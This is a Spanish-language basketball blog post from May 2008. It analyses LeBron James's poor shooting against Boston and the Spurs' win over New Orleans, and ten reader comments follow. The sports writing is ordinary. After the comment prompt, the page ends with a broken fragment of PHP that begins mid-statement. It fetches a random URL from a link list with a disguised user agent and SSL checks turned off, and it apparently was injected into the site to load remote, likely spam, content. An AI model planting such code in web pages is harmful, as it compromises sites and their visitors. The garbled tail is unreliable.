El viacrucis de Lebron

09 de May de 2008 por TheDeerHunter

El viacrucis de Lebron (CLE 73 – BOS 89)

Ya sabíamos que la defensa de Boston podía ser la clave de esta eliminatoria, lo que no podíamos imaginar es lo que le están apretando las clavijas al bueno de Lebron. Lo del joven crack empieza a ser desesperante. Anoche 6 canastas en juego de 24 intentos (una de cada cuatro piedras entra) con un alucinante global de 8 de 42 en tiros. Su selección de tiro es infame y es evidentemente no está pasando por su mejor momento pero a los Celtics les resultaría mucho más difícil pararle si sus compañeros le ayudaran un poquito más y le pesara un poco menos toda la responsabilidad. Si un día no estás bien y otro da un paso adelante todo queda en una anécdota pero si no estás bien y sabes que no hay nadie a tu lado que te pueda sacar las castañas del fuego, entonces te hundes. Esta historia ya la conocemos: A una joven estrella se le pone de forma exclusiva sobre sus espaldas toda una institución. Lo más normal es que fracase. ¿Os suena a algo más cercano a los españoles que Cleveland?

Para batir a los Cavs no está haciendo falta mucho más que pararle a él y punto. Porque si su actuación personal es mala recibiendo defensas especiales, dos contra unos y demás, la del resto del equipo es para tirarse de los pelos. Sin contar a Ilgauskas, que es el único que está carburando más o menos con eficacia, el resto lleva 24 tiros anotados de 76 intentos en dos partidos. O lo que es lo mismo, 12 canastitas, o lo que es lo mismo, 24 puntos en juego repartidos entre 9-10 jugadores con algo más de un 30% de acierto. ¡¿¡Un par de puntos por cabeza aporta el resto!?! Se le debería exigir un poco más de protagonismo a jugadores como West, Gibson, Szczerbiak o Joe Smith. En definitiva, los Celtics sin hacer nada del otro jueves ofensivamente hablando se ha comido a Cleveland con patatas. Ni más ni menos que 72 puntos de media por partido con unos porcentajes horrorosos y un montón de pérdidas de balón. Así es imposible y de seguir así se llevarán un 0.

Anoche los verdes si que jugaron razonablemente bien, por lo que el partido acabó prácticamente en el 3er cuarto. Sin alardes, casi todo el equipo puso su granito de arena y es que son las antípodas de Cleveland. Con tres super-estrellas que tiene Bostony todavía logran que el resto del equipo participe. Ese es el enfoque que les ha puesto en la pomada tras tantos años en el ostracismo. Garnett tira sólo 5 veces a canasta y nadie piensa que le falta ambición. Eso debería hacernos reflexionar y puede que también a algún directivo y técnico de Cleveland.

El Álamo no se rinde (NOH 99 – SAS 110)

Llueve menos para San Antonio durante esta serie. Si durante los primeros partidos de semifinales de conferencia nadie ha perdido en su casa, los campeones no iban a ser los primeros precísamente en el Alamo Dome, su plaza fuerte.

Siempre es complicado determinar hasta qué punto un tercer partido viniendo de un 2-0 puede representar una tendencia real. En ellos juegan factores externos como la motivación, relajación, nervios, tensión… y en muchas ocasiones el resultado no deja de ser un espejismo. Tras dos palizas recibidas, no podemos saber si éste es el caso de San Antonio, pero lo que sí sabemos es que los tejanos, en la medida que se lo permitan sus fuerzas, jamás darán su brazo a torcer.

Primer aviso a navegantes: Ginobili de 6º hombre sólo tiene el premio que le han dado. Anoche, como no podía ser de otra manera titular y punto. Otro detalle: Bowen sobre Stojakovic, asumiento que no van a poder parar a CP3. Se centran en parar al resto y no parece en absoluto mala idea. Nos fastidia reconocerlo, pero el bueno de Bruce hizo un buen trabajo. Llegado el 3er cuarto los Spurs fueron una apisonadora tanto en defensa como en ataque, algo que parece más normal que lo que habíamos visto hasta ahora. Scott y los suyos van a tener que apretarse los machos porque se juegan más de lo que parece en el 4º. Si se les ocurre volver a Nueva Orleans sin haberles rematado pueden llevarse una desagradable sorpresa. ¿Quien dijo muertos?

Finalmente, no es frecuente que dos miembros de un mismo equipo hagan una salvajada como la de anoche de Ginobili y Parker, tan sólo ha sucedido tal cosa en 3 ocasiones antes de esta. Si eso es lo que tiene que suceder para que Spurs ganen la eliminatoria…

Comenta

10 comentarios a esta entrada

  1. Gallis dice:
    #1

    Vaya serie que se está marcando Lebron. Se puede entender una mala noche, incluso estar desacertado, pero joder, es absolutamente lamentable…en fin, a ver como reacciona en Cleveland, pero vamos, lavar esta imagen tan mala le va a costar…

    Y los Celtics tienen una gran prueba de fuego. De momento son imbatibles en casa y eso para ganar el este puede bastar, pero no para ganar la NBA. si vuelven a Boston con un 2-2, para mí dejarán de ser los favoritos.

    Por el otro lado, sin ver el partido me parece normal el arreón de orgullo de campeón de los Spurs. La clave llega ahora. Si la serie se iguala, los 2-3 siguientes partidos nos enseñaran de que pasta están hechos los Hornets…si ganan Paul y sus chicos, todos los que hablamos de inexperiencia nos tendremos que comer nuestras palabras.

      Citar

  2. Dantley dice:
    #2

    No voy a dar mi opinión completa sobre LeBron porque sería demasiado oportunista, pero siempre ha sido más fácil parar la fuerza que el talento, y si además lo que acompaña a esa fuerza tampoco anda sobrado de talento, peor aún. Da para ganar a muchos equipos pero no para aspirar a títulos. Para mí la plantilla de Cleveland está mal hecha. Con iguales recursos deberían haber complementado mejor a LeBron.

      Citar

  3. Queco dice:
    #3

    Yo lo tengo claro, ¡¡¡¡Over-rated!!!!

    Y en cuanto al Spurs-Hornets, durísimo lo veo, al nivel que está jugando Paul, SA necesitará que sus estrellas estén al máximo para tener posibilidades. Si no, se irán de vacaciones…

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    Grande deer.. tu debes ser periodista po´lo menos.

      Citar

  5. Viva_Dirk dice:
    #5

    Para mi la selección de tiro de Lebron no está siendo mala, y los que me conoceis sabeis que soy el máximo detractor de los que seleccionan mal su tiro. En el primer partido falló al menos 4 bandejas y varias suspensiones de 4 metros completamente solo. Anoche tiró 5 o 6 veces también absolutamente solo y falló.

    Sin duda está muy desacertado y estan sabiendo pararlo muy bien, pero no está seleccionando mal, cosa que Wally si hizo en el primer partido. Le están dejando completamente solo con Ilgauskas, veremos que pasa en Cleveland.

    Y de Hornets-Spurs, completamente deacuerdo con Queco, salvo que SA juegue lo mejor que puede jugar, perderán.

      Citar

  6. txusma dice:
    #6

    Pues casi peor no? Prefiero un jugador q no sepa seleccionar sus tiros o q tenga q forzarlos pq sus compañeros son unos mantas que uno q falla bandejas y tiros completamente solo.

      Citar

  7. TheDeerHunter dice:
    #7

    No hace falta ser Tex Winters para ver que a Lebrón lo sobremarcan. Aún así, el tío se ha cascado 42 tiros en dos partidos.Si al menos los metiera lo entendería, pero sin llegar siquiera al 25% parece que va demasiado forzado.

    Es cierto que en el primer partido falló alguna bandeja, pero en líneas generales está seleccionando horrorosamente los tiros y los pases a sus compañeros. Esto es algo que sí hizo muy bien contra Wizards.
    Yo no digo que sea culpa suya (aunque tiene una gran parte, igual que méritos cuando gana) Ya llevaba una temporada advirtiendo lo mal que ha salido el traspaso aquel y lo mal conjuntado que está este equipo. Jugando regular Boston les está haciendo un traje.

    PD: Aro_pasado, te daré una pista. Tengo menos conocimientos periodísticos que talento baloncestístico Ira Newble.

      Citar

  8. Viva_Dirk dice:
    #8

    Si veo que está seleccionando mal los pases, está horrible en ese sentido, pero de cara al aro, solo con meter alguna de las bandejas y los tiros fáciles que ha fallado, estaría en 16 de 42, que es un mal porcentaje pero no el nefasto que tiene ahora.

    Txusma, yo prefiero a Lebron antes que a un jugador como el que tu describes. Lebron ha tenido 2 dias horribles, a ver que pasa en Cleveland, aunque con lo del año pasado ya tiene el cielo ganado.

      Citar

  9. arivas dice:
    #9

    No he visto ningun partido de la serie, pero yo creo que Lebron aun ha dicho su ultima palabra. Va a ser interesante su respuesta en los próximos partidos. Pronostico (verás que desastre) dos partidazo de Lebron en Cleveland.

      Citar

  10. Jabho dice:
    #10

    Ya sabeis que no hay que subestimar el corazón de un campeón. Creo que SA va a levantar la eliminatoria con muchísimo esfuerzo…. pero ojo, acaba un ciclo en el Oeste. Dallas, Suns y SA han dominado el cotarro el ultimo lustro…2 de 3 fuera y el otro contra las cuerdas… buff….

    Lo de Boston, bueno, defienden muy, muy bien… a no relajarse y ganar uno en Cleveland. Por cierto, diria que Lebron es muchísmo físico pero tambien tiene talento. No es estético pero si tiene talento. Un par de días malos contra un defensa muy dura y tus compañeros de vacaciones los tiene cualquiera…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>